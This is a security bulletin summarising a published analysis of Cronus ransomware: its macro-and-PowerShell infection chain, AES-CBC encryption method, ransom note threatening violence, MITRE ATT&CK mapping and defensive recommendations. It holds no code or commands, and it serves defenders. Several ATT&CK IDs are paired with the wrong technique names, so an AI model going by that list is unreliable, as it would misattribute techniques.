Summary:
Cronus is a sophisticated ransomware strain developed using .NET technology, first reported by Seqrite. This analysis arose from the discovery of a malicious document presented as a PayPal invoice, which was submitted to VirusTotal. The investigation outlines the ransomware's method of file encryption, its persistence mechanisms, and a detailed examination of its ransom note.

The intrusion process begins when a user interacts with the malicious document, activating macros that prompt the download and execution of a PowerShell script. This script is responsible for loading the Cronus ransomware DLL. The entire chain of this malicious activity is documented, with all relevant samples available on VirusTotal for further inspection.

Once activated, the Cronus ransomware copies itself to the user’s AppData directory. It checks whether a copy already exists, and if so, deletes it to ensure a fresh execution. The malware then scans all accessible drives on the device, identifying folders and files eligible for encryption while deliberately excluding certain critical system directories and files, such as "windows" and "program files."

Cronus employs AES encryption, with its methodology varying based on the size of the files. For files smaller than 512 KB, the ransomware uses a single encryption function known as FULL_ENCRYPT, which processes files using AES in Cipher Block Chaining (CBC) mode. This method encrypts data in blocks, ensuring a complex and secure encryption process. For larger files, the ransomware splits the files into three sections, applying the encryption process multiple times to enhance security.

The ransomware targets a vast array of file types, appending a random five-character alphanumeric extension to each encrypted file. This is a deviation from other ransomware strains, which typically use a uniform extension for all encrypted files. The analysis includes a comprehensive list of targeted file extensions, highlighting the ransomware's broad reach across various document types, media files, and database formats.

Security Officer Comments:
Upon successful encryption of files, Cronus drops a ransom note named "cronus.txt." This note outlines the attackers' demands, threatening bodily harm to the victim and their family if the ransom is not paid. Uniquely, the note lacks proof of data exfiltration—a common feature in other ransomware communications—and only provides an email contact for negotiations. Victims are instructed to pay $500 in Bitcoin, promising a decryption tool in exchange for proof of payment. The note also ominously warns that failure to comply could lead to live-streamed torture.

Notably, the specified Bitcoin wallet linked to the ransom note showed no transactions or activity as of October 4, 2024. This raises questions about the effectiveness of the ransomware's deployment and suggests that victims may be refusing to pay the ransom.

MITRE Attack:

• T1055: Process Hollowing
• T1218: Reflective Code Loading
• T1083: File and Directory Discovery
• T1007: Process Discovery
• T1059.001: Command and Scripting Interpreter: PowerShell
• T1059.005: Command and Scripting Interpreter: Visual Basic
• T1203: User Execution: Malicious File
• T1486: Data Encrypted for Impact

Suggested Corrections:
Backup your data, system images, and configurations, regularly test them, and keep the backups offline: Ensure that backups are regularly tested and that they are not connected to the business network, as many ransomware variants try to find and encrypt or delete accessible backups. Maintaining current backups offline is critical because if your network data is encrypted with ransomware, your organization can restore systems.

Update and patch systems promptly: This includes maintaining the security of operating systems, applications, and firmware in a timely manner. Consider using a centralized patch management system; use a risk-based assessment strategy to drive your patch management program.

Test your incident response plan: There's nothing that shows the gaps in plans more than testing them. Run through some core questions and use those to build an incident response plan: Are you able to sustain business operations without access to certain systems? For how long? Would you turn off your manufacturing operations if business systems such as billing were offline?

Check Your Security Team's Work: Use a 3rd party pen tester to test the security of your systems and your ability to defend against a sophisticated attack. Many ransomware criminals are aggressive and sophisticated and will find the equivalent of unlocked doors.

Segment your networks: There's been a recent shift in ransomware attacks – from stealing data to disrupting operations. It's critically important that your corporate business functions and manufacturing/production operations are separated and that you carefully filter and limit internet access to operational networks, identify links between these networks, and develop workarounds or manual controls to ensure ICS networks can be isolated and continue operating if your corporate network is compromised. Regularly test contingency plans such as manual controls so that safety-critical functions can be maintained during a cyber incident.

Train employees: Email remains the most vulnerable attack vector for organizations. Users should be trained on how to avoid and spot phishing emails. Multi-factor authentication can help prevent malicious access to sensitive services.

Link(s):
https://blog.pulsedive.com/threat-research-cronus-ransomware-threatening-bodily-harm/